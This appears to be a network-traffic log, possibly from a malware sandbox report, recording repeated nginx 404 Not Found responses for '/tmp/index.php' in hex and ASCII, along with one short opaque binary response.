    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
